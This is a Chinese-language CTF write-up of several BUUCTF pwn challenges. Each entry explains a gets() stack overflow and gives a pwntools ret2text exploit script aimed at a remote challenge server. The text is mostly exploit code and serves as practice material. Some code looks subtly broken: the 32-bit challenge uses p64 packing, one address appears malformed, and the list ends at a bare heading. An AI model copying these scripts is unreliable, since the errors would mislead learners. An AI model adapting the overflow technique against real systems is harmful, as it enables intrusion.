1.text_your_nc
签到题,直接nc一下
2.rip
checksec一下,发现没开啥保护,是64位程序
丢进ida,发现gets函数存在栈溢出漏洞
同时发现fun函数,那就是ret2text的题型。
找偏移,构造payload
from pwn import *
#context.log_level='debug'
p = remote('node5.buuoj.cn',29576)
system = 0x4001187
payload = b'a' * 23 + p64(system)
p.sendline(payload)
p.interactive()
3.warmup_csaw_2016
checksec一下,啥也没开,是64位程序
丢进ida里,发现gets函数可以向v5数组里写入超长数据进而造成栈溢出。同样找到了后门函数,又是ret2text。
找offset,构造payload
from pwn import *
#context.log_level='debug'
p = remote('node5.buuoj.cn',29896)
system = 0x400611
payload = b'a' * 0x40 +b'a' * 0x8 + p64(system)
p.sendline(payload)
p.interactive()
4.ciscn_2019_n_1 1
64位程序开启了NX保护
放进ida,一眼还是ret2text
直接构造payload
from pwn import *
#context.log_level='debug'
p = remote('node5.buuoj.cn',29878)
system = 0x4006be
payload = b'a' * 0x30 +b'a' * 0x8 + p64(system)
p.sendline(payload)
p.interactive()
5.pwn1_sctf_2016
开启了NX保护是32位程序
放进ida,首先向S数组读入了32字节,这不足以造成栈溢出
并且在左侧函数栏发现了get_flag函数
通过运行输入尝试发现当我们输入I时,它会将I变为you进行输出,所以我们可以利用这种转换关系来进行栈溢出,这道题实质上还是ret2text
构造payload
from pwn import *
#context.log_level='debug'
p = remote('node5.buuoj.cn',25132)
system = 0x8048F0d
#0x3c = 60
payload = b'I' * 20 + b'a' * 4 + p64(system)
p.sendline(payload)
p.interactive()
6.jarvisoj_level0